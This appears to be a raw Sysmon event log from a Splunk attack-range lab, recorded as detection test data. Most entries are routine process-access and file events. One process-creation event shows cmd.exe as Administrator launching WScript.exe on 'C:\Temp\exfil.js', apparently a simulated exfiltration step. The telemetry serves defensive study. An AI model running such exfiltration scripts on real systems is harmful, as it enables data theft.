14:21:19.092{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.092{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.092{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-18DF-629A-6442-000000005F02}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.092{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18DF-629A-6442-000000005F02}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.087{2E1864BB-18DF-629A-6442-000000005F02}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000206016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.544{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000206015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.544{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E753864629598C2188B96AA0F43EE406,SHA256=F68A5285AE90548AE3D5A8E43A5640516F4D2CE56CD58C3E8AE1B6390C67EB1F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.544{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\WScript.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.544{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\WScript.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.474{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.474{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.474{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\WScript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.474{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.474{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.474{2E1864BB-0F1D-629A-270A-000000005F02}46764864C:\Windows\system32\cmd.exe{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\WScript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.472{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=95B2CC3A306C4C1059A53B660096F0A5,SHA256=8B2E206D1F6B510AD73C7541C03F39F9E4DDD7E3D1B9E31F3C8829C64B42E075,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{2E1864BB-0F1D-629A-270A-000000005F02}4676C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Temp" 10341000x8000000000000000206005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-0F1D-629A-270A-000000005F02}4676C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.443{2E1864BB-18E0-629A-6642-000000005F02}42885044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044788Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:20.252{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDF153414354B138697B66283D83BB81,SHA256=995510441A6B76E94E886BBC3284E2E02E8017B6480756FABBBEFA893E9E4E77,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.274{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18E0-629A-6642-000000005F02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.259{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.259{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.259{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.259{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.259{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-18E0-629A-6642-000000005F02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.259{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18E0-629A-6642-000000005F02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:20.260{2E1864BB-18E0-629A-6642-000000005F02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044787Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:20.033{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=2481FCAEB541D8D735B754DAA6DE19C3,SHA256=B72C8EB1373215269B9EF70985003D701009B13936A34AF826C291E1CB391BD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000206017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:21.545{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C44964C6124376C652A43670C55AF01,SHA256=B0A8BBC611644FA48F678F468A6124003114A179106E11B88A69AD1892D63CF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044789Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:21.346{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F054AF5C65CD376C2F47EAB07B2EE22,SHA256=806648C83295B5B541F433820C6B6B41F6A018C072C4A78C2FE7C006346300CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044790Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:22.439{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4607217292320263F5B2C287F3BD3BC,SHA256=7C9D68140E137C170BAF77503EE77BFAB1AA79328F0239B5905AE752A72C785A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 